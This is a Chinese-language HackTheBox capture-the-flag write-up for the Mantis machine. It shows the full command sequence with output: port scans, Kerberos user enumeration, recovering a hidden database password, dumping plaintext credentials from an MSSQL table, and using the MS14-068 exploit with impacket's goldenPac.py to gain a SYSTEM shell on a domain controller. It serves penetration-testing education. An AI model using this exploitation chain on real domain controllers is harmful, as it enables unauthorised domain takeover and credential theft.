HackTheBox Writeup之拿下Mantis主機許可權過程

本次我們要拿下的主機是Mantis，我們需要很多的耐心和一點點的枚舉才能成功。最終的利用姿勢也非常酷，因為我以前從未做過類似的事情。真的很高興可以看到一個域控制器最終能在HackTheBox中彈出一個Shell。

埠掃描

讓我們開始使用nmap掃描。

root@kali:~/htb/mantis# nmap -A 10.10.10.52 Starting Nmap 7.50 ( https://nmap.org )Nmap scan report for 10.10.10.52Host is up (0.11s latency).Not shown: 981 closed portsPORT STATE SERVICE VERSION53/tcp open domain Microsoft DNS 6.1.7601| dns-nsid:|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)88/tcp open tcpwrapped135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM| ms-sql-ntlm-info:| Target_Name: HTB| NetBIOS_Domain_Name: HTB| NetBIOS_Computer_Name: MANTIS| DNS_Domain_Name: htb.local| DNS_Computer_Name: mantis.htb.local|_ Product_Version: 6.1.7601| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback| Not valid before: 2018-02-09T14:23:56|_Not valid after: 2048-02-09T14:23:56|_ssl-date: 2018-02-09T14:30:53+00:00; 0s from scanner time.3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)3269/tcp open tcpwrapped8080/tcp open http Microsoft IIS httpd 7.5|_http-server-header: Microsoft-IIS/7.5|_http-title: Tossed Salad - Blog49152/tcp open msrpc Microsoft Windows RPC49153/tcp open msrpc Microsoft Windows RPC49154/tcp open msrpc Microsoft Windows RPC49155/tcp open msrpc Microsoft Windows RPC49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049158/tcp open msrpc Microsoft Windows RPCNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.50%E=4%D=2/9%OT=53%CT=1%CU=35559%PV=Y%DS=2%DC=T%G=Y%TM=5A7DB115OS:%P=i686-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=108%CI=I%TS=7)SEQ(SP=101%GCD=1OS:%ISR=107%TS=7)SEQ(SP=103%GCD=1%ISR=108%TI=RD%CI=I%TS=8)OPS(O1=M54DNW8ST1OS:1%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DSTOS:11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80OS:%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(ROS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hopsService Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results:| ms-sql-info:| 10.10.10.52:1433:| Version:| name: Microsoft SQL Server 2014 RTM| number: 12.00.2000.00| Product: Microsoft SQL Server 2014| Service pack level: RTM| Post-SP patches applied: false|_ TCP port: 1433| smb-os-discovery:| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1| Computer name: mantis| NetBIOS computer name: MANTISx00| Domain name: htb.local| Forest name: htb.local| FQDN: mantis.htb.local|_ System time: 2018-02-09T09:30:52-05:00| smb-security-mode:| account_used: <blank>| authentication_level: user| challenge_response: supported|_ message_signing: required|_smbv2-enabled: Server supports SMBv2 protocol TRACEROUTE (using port 111/tcp)HOP RTT ADDRESS1 52.42 ms 10.10.14.12 252.79 ms 10.10.10.52 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 264.56 seconds

OK，掃描完畢，在這裡我們有相當多的東西可以用來分析。我們發現這台主機開放了LDAP埠，可以說明這是一個域控制器。8080埠上似乎正在運行著一個IIS站點，所以讓我們來看看頁面。

除了登錄信息外，沒有太多的信息，連用戶名也不知道。使用gobuster掃描後除了與Orchard網站相關的目錄之外，也沒有返回任何東西。我們可以嘗試通過kerberos來列舉用戶名，看看我們是否可以得到某些東西。

root@kali:~/htb/mantis# nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm=htb.local,userdb=/usr/share/seclists/Usernames/Names/names.txt 10.10.10.52 Starting Nmap 7.50 ( https://nmap.org )Nmap scan report for 10.10.10.52Host is up (0.068s latency). PORT STATE SERVICE88/tcp open kerberos-sec| krb5-enum-users:| Discovered Kerberos principals|_ James@htb.local

現在我們拿到一個用戶名。但是，在嘗試使用將james或james@htb.local作為之前的Orchard站點的登錄頁面的用戶名並猜解密碼後，我們只是收到以下消息：

在這種情況下，似乎對於大多數人來說都比較棘手。讓我們啟動nmap並運行完整的埠掃描，來看看是否有我們最初的掃描未找到的其他埠。

root@kali:~/htb/mantis# nmap -p- 10.10.10.52 -T4 Starting Nmap 7.50 ( https://nmap.org )Initiating Ping Scan at 10:05Scanning 10.10.10.52 [4 ports]Completed Ping Scan at 10:05, 0.42s elapsed (1 total hosts)Initiating Parallel DNS resolution of 1 host. at 10:05Completed Parallel DNS resolution of 1 host. at 10:05, 6.18s elapsedInitiating SYN Stealth Scan at 10:05Scanning 10.10.10.52 [65535 ports] PORT STATE SERVICE53/tcp open domain88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl1337/tcp open waste1433/tcp open ms-sql-s3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPssl5722/tcp open msdfsr8080/tcp open http-proxy9389/tcp open adws47001/tcp open winrm49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49157/tcp open unknown49158/tcp open unknown49164/tcp open unknown49166/tcp open unknown49168/tcp open unknown50255/tcp open unknown

這次掃描需要很長一段時間，但我們確實看到了1337埠是開放的。如果我們用瀏覽器訪問這個埠，會看到默認的IIS登錄頁。

讓我們使用gobuster為我們開啟新發現的港口。

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 Gobuster v1.2 OJ Reeves (@TheColonial)=====================================================[+] Mode : dir[+] Url/Domain : http://10.10.10.52:1337/[+] Threads : 10[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Status codes : 200,204,301,302,307=====================================================/secure_notes (Status: 301)

在掃描了很久之後，我們終於得到了一點有用的信息。

該web.config文件會引發404錯誤。dev_notes後面那一串看起來像是base64編碼過的。頁面的內容為我們提供了用戶名——admin以及資料庫名稱orcharddb。

讓我們嘗試解碼文件名中的base64。

root@kali:~/htb/mantis# base64 -d <<< NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx6d2424716c5f53405f504073735730726421

這與任何常見的加密散列長度都不匹配，但看起來像十六進位。

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -pm$$ql_S@_P@ssW0rd!

繼續！讓我們拿這些憑證進行登錄。如果我們試圖使用sqsh工具把sa作為用戶名和我們之前得到的密碼連接MSSQL，會返回訪問拒絕。然而，使用admin用戶和上面的那個密碼，我們就登錄進來了。

root@kali:~/htb/mantis# sqsh -S 10.10.10.52 -U adminsqsh-2.1.7 Copyright (C) 1995-2001 Scott C. GrayPortions Copyright (C) 2004-2010 Michael PepplerThis is free software with ABSOLUTELY NO WARRANTYFor more information type warrantyPassword:1>

現在我們列舉資料庫orcharddb裡面的表名。

注意：我已經格式化了下面的內容，sqsh的輸出格式有些混亂。如果需要，你可以輸出到CSV文件並查看其他內容。命令是：

go -m csv > /root/htb/mantis/table.csv1> SELECT TABLE_NAME FROM orcharddb.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = BASE TABLE;2> go TABLE_NAME ------------------------------------------------------------------------------- blog_Orchard_Blogs_RecentBlogPostsPartRecord blog_Orchard_Blogs_BlogArchivesPartRecord blog_Orchard_Workflows_TransitionRecord blog_Orchard_Workflows_WorkflowRecord blog_Orchard_Workflows_WorkflowDefinitionRecord blog_Orchard_Workflows_AwaitingActivityRecord blog_Orchard_Workflows_ActivityRecord blog_Orchard_Tags_TagsPartRecord blog_Orchard_Framework_DataMigrationRecord blog_Orchard_Tags_TagRecord blog_Orchard_Tags_ContentTagRecord blog_Settings_ContentFieldDefinitionRecord blog_Orchard_Framework_DistributedLockRecord blog_Settings_ContentPartDefinitionRecord blog_Settings_ContentPartFieldDefinitionRecord blog_Settings_ContentTypeDefinitionRecord blog_Settings_ContentTypePartDefinitionRecord blog_Settings_ShellDescriptorRecord blog_Settings_ShellFeatureRecord blog_Settings_ShellFeatureStateRecord blog_Settings_ShellParameterRecord blog_Settings_ShellStateRecord blog_Orchard_Framework_ContentItemRecord blog_Orchard_Framework_ContentItemVersionRecord blog_Orchard_Framework_ContentTypeRecord blog_Orchard_Framework_CultureRecord blog_Common_BodyPartRecord blog_Common_CommonPartRecord blog_Common_CommonPartVersionRecord blog_Common_IdentityPartRecord blog_Containers_ContainerPartRecord blog_Containers_ContainerWidgetPartRecord blog_Containers_ContainablePartRecord blog_Title_TitlePartRecord blog_Navigation_MenuPartRecord blog_Navigation_AdminMenuPartRecord blog_Scheduling_ScheduledTaskRecord blog_Orchard_ContentPicker_ContentMenuItemPartRecord blog_Orchard_Alias_AliasRecord blog_Orchard_Alias_ActionRecord blog_Orchard_Autoroute_AutoroutePartRecord blog_Orchard_Users_UserPartRecord blog_Orchard_Roles_PermissionRecord blog_Orchard_Roles_RoleRecord blog_Orchard_Roles_RolesPermissionsRecord blog_Orchard_Roles_UserRolesPartRecord blog_Orchard_Packaging_PackagingSource blog_Orchard_Recipes_RecipeStepResultRecord blog_Orchard_OutputCache_CacheParameterRecord blog_Orchard_MediaProcessing_ImageProfilePartRecord blog_Orchard_MediaProcessing_FilterRecord blog_Orchard_MediaProcessing_FileNameRecord blog_Orchard_Widgets_LayerPartRecord blog_Orchard_Widgets_WidgetPartRecord blog_Orchard_Comments_CommentPartRecord blog_Orchard_Comments_CommentsPartRecord blog_Orchard_Taxonomies_TaxonomyPartRecord blog_Orchard_Taxonomies_TermPartRecord blog_Orchard_Taxonomies_TermContentItem blog_Orchard_Taxonomies_TermsPartRecord blog_Orchard_MediaLibrary_MediaPartRecord blog_Orchard_Blogs_BlogPartArchiveRecord (62 rows affected)

blog_Orchard_Users_UserPartRecord表看起來像是我們需要的。

1> USE orcharddb;2> go1> SELECT * FROM blog_Orchard_Users_UserPartRecord;2> goId UserNameEmail NormalizedUserNamePassword PasswordFormatHashAlgorithm PasswordSalt RegistrationStatus EmailStatus EmailChallengeTokenCreatedUtc LastLoginUtc LastLogoutUtc -------------------------------------------------------------------------------2admin admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== Hashed PBKDF2 UBwWF1CQCsaGc/P7jIR/kg== Approved Approved NULL Sep 1 2017 01:44PM Sep 1 2017 02:03PM Sep 1 2017 02:06PM15James james@htb.local james J@m3s_P@ssW0rd! Plaintext Plaintext NA Approved Approved NULL Sep 1 2017 01:45PM NULL NULL (2 rows affected)

非常好，我們有james的密碼。我們已經知道，作為james登錄到webapp只會引發異常。那麼讓我們通過SMB測試這些憑據，看看它們是否是有效的Windows憑據。

root@kali:~/htb/mantis# smbclient -L 10.10.10.52/ -U jamesWARNING: The "syslog" option is deprecatedEnter WORKGROUPjamess password:Domain=[HTB] OS=[] Server=[] Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share

事實上它們是有效的。我們可以成功列出機器上的共享。快速瀏覽一下，在SYSVOL中我們可以看到兩個組策略對象，但這裡沒有什麼用處。

漏洞利用

我們的憑證不能用過winexe為我們返回一個Shell，所以我們必須找出另一種方式。既然我們知道這是一個域控制器，也許我們可以利用Kerberos為我們提供我們想要的東西。

有關如何進行攻擊的詳細說明，請點擊此處：http://adsecurity.org/?p=541

關於如何在這裡遠程執行攻擊可以看這篇寫的很好的文章：http://blog.liatsisfotis.com/knock-and-pass-kerberos-exploitation.html

在按照文章中安裝了指定的依賴關係並獲取最新版本的impacket後，我們就可以開始進行攻擊了。讓我們編輯/etc/hosts並添加到域控制器中。

127.0.0.1 localhost127.0.1.1 kali10.10.10.52 mantis.htb.local mantis

現在我們配置 /etc/krb5.conf

libdefaults] default_realm = HTB.LOCAL # The following krb5.conf variables are only for MIT Kerberos. kdc_timesync = 1 ccache_type = 4 forwardable = true proxiable = true [realms] HTB.LOCAL = { kdc = mantis.htb.local:88 admin_server = mantis.htb.local default_domain = HTB.LOCAL }[domain_realm] .domain.internal = HTB.LOCAL domain.internal = HTB.LOCAL

讓我們與DC同步一下我們的時間。

rdate -n 10.10.10.52

所以現在我們可以準備開始我們的攻擊過程了。首先，我們使用impacket工具生成我們的票證。

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# kinit jamesPassword for james@HTB.LOCAL:root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# klistTicket cache: FILE:/tmp/krb5cc_0Default principal: james@HTB.LOCAL Valid starting Expires Service principal02/09/2018 15:29:07 02/10/2018 01:29:07 krbtgt/HTB.LOCAL@HTB.LOCALrenew until 02/10/2018 15:28:37

接下來我們需要獲取james的SID。

root@kali:~/htb/mantis/impacket-master/impacket-master/impacket/examples# rpcclient -U james mantisEnter WORKGROUPjamess password:rpcclient $> lookupnames jamesjames S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

現在我們運行我們的MS14-068 python exploit腳本。

root@kali:~/htb/mantis/pykek-master# python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantisPassword: [+] Building AS-REQ for mantis... Done! [+] Sending AS-REQ to mantis... Done! [+] Receiving AS-REP from mantis... Done! [+] Parsing AS-REP from mantis... Done! [+] Building TGS-REQ for mantis... Done! [+] Sending TGS-REQ to mantis... Done! [+] Receiving TGS-REP from mantis... Done! [+] Parsing TGS-REP from mantis... Done! [+] Creating ccache file TGT_james@HTB.LOCAL.ccache... Done!

默認情況下，客戶端使用的任何用戶票證授予票證（TGT）都是從位於的默認Kerberos憑據緩存中讀取的，緩存位於/tmp/krb5cc_uid。所以，現在我們有了我們的緩存文件，我們需要將其複製到適當的位置。

root@kali:~/htb/mantis/pykek-master# cp TGT_james@HTB.LOCAL.ccache /tmp/krb5cc_0

隨著一切就緒，我們可以使用來自impacket的工具的goldenPAC.py來獲得一個Shell。

root@kali:~/htb/mantis/impacket-master/impacket-master/examples# ./goldenPac.py HTB.LOCAL/james@mantisImpacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies Password:[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657[*] Attacking domain controller mantis.htb.local[*] mantis.htb.local found vulnerable![*] Requesting shares on mantis.....[*] Found writable share ADMIN$[*] Uploading file cugfXzCt.exe[*] Opening SVCManager on mantis.....[*] Creating service QcYY on mantis.....[*] Starting service QcYY.....[!] Press help for extra shell commandsMicrosoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:Windowssystem32>whoami & hostnament authoritysystemmantis

現在，我們拿到了SYSTEM用戶的Shell！通過這個Shell我們就可以拿到user.txt和root.txt。

本文翻譯自：https://www.sploitspren.com/2018-02-24-HackTheBox-Mantis-Writeup/ ，如若轉載，請註明原文地址： http://www.4hou.com/technology/10603.html 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：